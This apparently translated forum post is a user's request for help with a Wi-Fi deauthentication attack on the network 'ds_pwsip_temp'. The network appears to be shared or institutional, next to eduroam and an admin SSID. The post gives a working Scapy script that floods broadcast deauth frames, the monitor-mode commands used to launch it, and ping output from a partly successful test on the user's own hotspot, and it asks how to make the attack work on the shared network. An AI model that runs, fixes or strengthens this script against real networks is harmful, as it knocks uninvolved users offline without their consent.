Eu quero enviar pacotes de desautorização para todos os clientes conectados a "ds_pwsip_temp". Parece que tudo está definido corretamente. Quando executo meu script, os pacotes estão sendo enviados, mas a conexão no meu outro laptop não é afetada.
adrian@adrian-Lenovo-Z70-80:~$ iwlist wlp3s0 scan
wlp3s0 Scan completed :
Cell 01 - Address: E4:F4:C6:F9:13:91
Channel:112
Frequency:5.56 GHz (Channel 112)
Quality=70/70 Signal level=-35 dBm
Encryption key:on
ESSID:"ds_pwsip_temp"
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8ec78570
Extra: Last beacon: 1060ms ago
IE: Unknown: 000D64735F70777369705F74656D70
IE: Unknown: 01088C129824B048606C
IE: Unknown: 030170
IE: Unknown: 073C504C202401142801142C01143001143401143801143C011440011464011B68011B6C011B70011B74011B78011B7C011B80011B84011B88011B8C011B
IE: Unknown: 200107
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E011BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E011BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C34700F0800000000000000000000000000000000000000
IE: Unknown: 3D16700F0800000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Cell 02 - Address: E4:F4:C6:F9:13:80
Channel:3
Frequency:2.422 GHz (Channel 3)
Quality=68/70 Signal level=-42 dBm
Encryption key:on
ESSID:"eduroam"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8f071286
Extra: Last beacon: 3340ms ago
IE: Unknown: 0007656475726F616D
IE: Unknown: 010882848B960C121824
IE: Unknown: 030103
IE: Unknown: 0706504C20010D14
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : 802.1x
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101840003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3403080A00000000000000000000000000000000000000
IE: Unknown: 3D1603080A00000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Cell 03 - Address: E4:F4:C6:F9:13:81
Channel:3
Frequency:2.422 GHz (Channel 3)
Quality=66/70 Signal level=-44 dBm
Encryption key:on
ESSID:"ds_pwsip_temp"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8f06d690
Extra: Last beacon: 3356ms ago
IE: Unknown: 000D64735F70777369705F74656D70
IE: Unknown: 010882848B960C121824
IE: Unknown: 030103
IE: Unknown: 0706504C20010D14
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101840003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3403080A00000000000000000000000000000000000000
IE: Unknown: 3D1603080A00000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Cell 04 - Address: E4:F4:C6:F9:13:84
Channel:3
Frequency:2.422 GHz (Channel 3)
Quality=65/70 Signal level=-45 dBm
Encryption key:on
ESSID:"DS-ADM"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8f06e1a8
Extra: Last beacon: 3352ms ago
IE: Unknown: 000644532D41444D
IE: Unknown: 010882848B960C121824
IE: Unknown: 030103
IE: Unknown: 0706504C20010D14
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101840003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3403080A00000000000000000000000000000000000000
IE: Unknown: 3D1603080A00000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Cell 05 - Address: E4:F4:C6:F9:13:85
Channel:3
Frequency:2.422 GHz (Channel 3)
Quality=68/70 Signal level=-42 dBm
Encryption key:off
ESSID:"DS-HotSpot"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8f06ec80
Extra: Last beacon: 3336ms ago
IE: Unknown: 000A44532D486F7453706F74
IE: Unknown: 010882848B960C121824
IE: Unknown: 030103
IE: Unknown: 0706504C20010D14
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101840003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E111BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C3403080A00000000000000000000000000000000000000
IE: Unknown: 3D1603080A00000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Cell 06 - Address: 00:0E:8E:43:A4:0F
Channel:5
Frequency:2.432 GHz (Channel 5)
Quality=36/70 Signal level=-74 dBm
Encryption key:off
ESSID:"HOTSPOT_UM"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=000001dc1c435310
Extra: Last beacon: 3248ms ago
IE: Unknown: 000A484F5453504F545F554D
IE: Unknown: 010882848B960C121824
IE: Unknown: 030105
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD2A000C42000000011E0010000001661D060000303030453845343341343046000000000000000005028009
Cell 07 - Address: E4:F4:C6:F9:13:90
Channel:112
Frequency:5.56 GHz (Channel 112)
Quality=70/70 Signal level=-36 dBm
Encryption key:on
ESSID:"eduroam"
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0000001c8ec78340
Extra: Last beacon: 1060ms ago
IE: Unknown: 0007656475726F616D
IE: Unknown: 01088C129824B048606C
IE: Unknown: 030170
IE: Unknown: 073C504C202401142801142C01143001143401143801143C011440011464011B68011B6C011B70011B74011B78011B7C011B80011B84011B88011B8C011B
IE: Unknown: 200107
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : 802.1x
IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
IE: Unknown: DD1E00904C338E011BFFFF000000000000000000000000000000000000000000
IE: Unknown: 2D1A8E011BFFFF000000000000000000000000000000000000000000
IE: Unknown: DD1A00904C34700F0800000000000000000000000000000000000000
IE: Unknown: 3D16700F0800000000000000000000000000000000000000
IE: Unknown: 4A0E14000A002C01C800140005001900
IE: Unknown: 7F0101
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010000004000
Eu não sei porque existem dois pontos de acesso chamados "ds_pwsip_temp" (por favor, explique).
Endereco: E4: F4: C6: F9: 13: 91 Canal: 112
Endereco: E4: F4: C6: F9: 13: 81 Canal: 3
Eu usei ambos os endereços (cada vez que eu mudo de canal no terminal).
Este é o meu script deauth:
#! /usr/bin/env python
from scapy.all import *
mac = "ff:ff:ff:ff:ff:ff"
bssid = "E4:F4:C6:F9:13:91"
pkt = RadioTap() / Dot11( addr1 = mac, addr2 = bssid, addr3 = bssid ) / Dot11Deauth()
sendp( pkt, iface = "wlp3s0", count = 10000, inter = .2 )
É assim que eu conduzo o ataque:
adrian@adrian-Lenovo-Z70-80:~$ sudo service network-manager stop
[sudo] password for adrian:
adrian@adrian-Lenovo-Z70-80:~$ iwconfig
wlp3s0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
enp2s0 no wireless extensions.
lo no wireless extensions.
adrian@adrian-Lenovo-Z70-80:~$ sudo ifconfig wlp3s0 down
adrian@adrian-Lenovo-Z70-80:~$ sudo iwconfig wlp3s0 mode monitor
adrian@adrian-Lenovo-Z70-80:~$ sudo ifconfig wlp3s0 up
adrian@adrian-Lenovo-Z70-80:~$ sudo iwconfig wlp3s0 channel 112
adrian@adrian-Lenovo-Z70-80:~$ iwconfig
wlp3s0 IEEE 802.11abgn Mode:Monitor Frequency:5.56 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
enp2s0 no wireless extensions.
lo no wireless extensions.
adrian@adrian-Lenovo-Z70-80:~$ sudo ./deauth.py
WARNING: No route found for IPv6 destination :: (no default route?)
..........................................................................................................................................................................^C
Sent 170 packets.
adrian@adrian-Lenovo-Z70-80:~$
Por que isso não está funcionando?
------------------------------ ATUALIZAÇÃO: ------------ ------------------
Outro teste, desta vez no hotspot Wi-Fi do meu telefone (WPA2 PSK) com apenas 1 cliente (meu outro laptop).
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Adrian>ping -t google.pl
Pinging google.pl [216.58.210.3] with 32 bytes of data:
Reply from 216.58.210.3: bytes=32 time=79ms TTL=49
Reply from 216.58.210.3: bytes=32 time=79ms TTL=49
Reply from 216.58.210.3: bytes=32 time=57ms TTL=49
Reply from 216.58.210.3: bytes=32 time=66ms TTL=49
Reply from 216.58.210.3: bytes=32 time=65ms TTL=49
Reply from 216.58.210.3: bytes=32 time=84ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=77ms TTL=49
Reply from 216.58.210.3: bytes=32 time=70ms TTL=49
Reply from 216.58.210.3: bytes=32 time=65ms TTL=49
Reply from 216.58.210.3: bytes=32 time=64ms TTL=49
Reply from 216.58.210.3: bytes=32 time=64ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=80ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=2826ms TTL=49
Reply from 216.58.210.3: bytes=32 time=78ms TTL=49
Reply from 216.58.210.3: bytes=32 time=67ms TTL=49
Reply from 216.58.210.3: bytes=32 time=65ms TTL=49
Reply from 216.58.210.3: bytes=32 time=64ms TTL=49
Reply from 216.58.210.3: bytes=32 time=62ms TTL=49
Reply from 216.58.210.3: bytes=32 time=60ms TTL=49
Reply from 216.58.210.3: bytes=32 time=68ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=93ms TTL=49
Reply from 216.58.210.3: bytes=32 time=75ms TTL=49
Reply from 216.58.210.3: bytes=32 time=102ms TTL=49
Reply from 216.58.210.3: bytes=32 time=72ms TTL=49
Reply from 216.58.210.3: bytes=32 time=80ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=65ms TTL=49
Reply from 216.58.210.3: bytes=32 time=63ms TTL=49
Reply from 216.58.210.3: bytes=32 time=61ms TTL=49
Reply from 216.58.210.3: bytes=32 time=72ms TTL=49
Reply from 216.58.210.3: bytes=32 time=67ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=87ms TTL=49
Reply from 216.58.210.3: bytes=32 time=64ms TTL=49
Reply from 216.58.210.3: bytes=32 time=72ms TTL=49
Reply from 216.58.210.3: bytes=32 time=111ms TTL=49
Reply from 216.58.210.3: bytes=32 time=80ms TTL=49
Request timed out.
Reply from 216.58.210.3: bytes=32 time=109ms TTL=49
Reply from 216.58.210.3: bytes=32 time=63ms TTL=49
Reply from 216.58.210.3: bytes=32 time=88ms TTL=49
Reply from 216.58.210.3: bytes=32 time=70ms TTL=49
Reply from 216.58.210.3: bytes=32 time=70ms TTL=49
Reply from 216.58.210.3: bytes=32 time=2018ms TTL=49
Reply from 216.58.210.3: bytes=32 time=87ms TTL=49
Reply from 216.58.210.3: bytes=32 time=64ms TTL=49
Reply from 216.58.210.3: bytes=32 time=63ms TTL=49
Reply from 216.58.210.3: bytes=32 time=70ms TTL=49
Reply from 216.58.210.3: bytes=32 time=59ms TTL=49
Reply from 216.58.210.3: bytes=32 time=67ms TTL=49
Reply from 216.58.210.3: bytes=32 time=75ms TTL=49
Reply from 216.58.210.3: bytes=32 time=83ms TTL=49
Reply from 216.58.210.3: bytes=32 time=751ms TTL=49
Reply from 216.58.210.3: bytes=32 time=62ms TTL=49
Reply from 216.58.210.3: bytes=32 time=69ms TTL=49
Reply from 216.58.210.3: bytes=32 time=66ms TTL=49
Reply from 216.58.210.3: bytes=32 time=86ms TTL=49
Reply from 216.58.210.3: bytes=32 time=83ms TTL=49
Reply from 216.58.210.3: bytes=32 time=61ms TTL=49
Reply from 216.58.210.3: bytes=32 time=61ms TTL=49
Reply from 216.58.210.3: bytes=32 time=58ms TTL=49
Reply from 216.58.210.3: bytes=32 time=66ms TTL=49
Ping statistics for 216.58.210.3:
Packets: Sent = 66, Received = 59, Lost = 7 (10% loss),
Approximate round trip times in milli-seconds:
Minimum = 57ms, Maximum = 2826ms, Average = 163ms
Control-C
^C
C:\Users\Adrian>
Poucos "Solicitações expiraram" antes de interromper o script. Como posso fazer funcionar com "ds_pwsip_temp"?